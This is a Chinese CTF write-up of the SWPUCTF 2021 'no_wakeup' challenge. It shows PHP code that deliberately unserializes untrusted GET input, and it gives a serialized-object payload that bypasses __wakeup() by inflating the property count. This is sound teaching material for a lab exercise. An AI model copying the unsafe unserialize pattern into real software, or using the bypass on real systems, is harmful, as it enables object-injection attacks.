Post

SWPUCTF 2021 新生赛 no_wakeup

高中时期在NSSCTF上刷题的题解

Posted Updated
By lamaper
1 min read
SWPUCTF 2021 新生赛 no_wakeup

[SWPUCTF 2021 新生赛]no_wakeup lamaper的WriteUp

知识点:反序列化、__weakup()绕过

进入题目发现源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>

在29行程序调用反序列化方法时,会自动执行__weakup()函数,而显然weakup方法会加密上传的序列化参数中的passwd,而sha1是不可逆加密算法,目前也没有合适的sha1碰撞的方式,故考虑到绕过__weakup()函数;

php的特性,当序列化后对象的参数列表中成员个数和实际个数不符合时会绕过 __weakup(); 因而先构造

1
2
3
4
5

$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus);

得到

1

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

修改得到

1

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

上传即可

Cyber Security
ctf web php
This post is licensed under CC BY 4.0 by the author.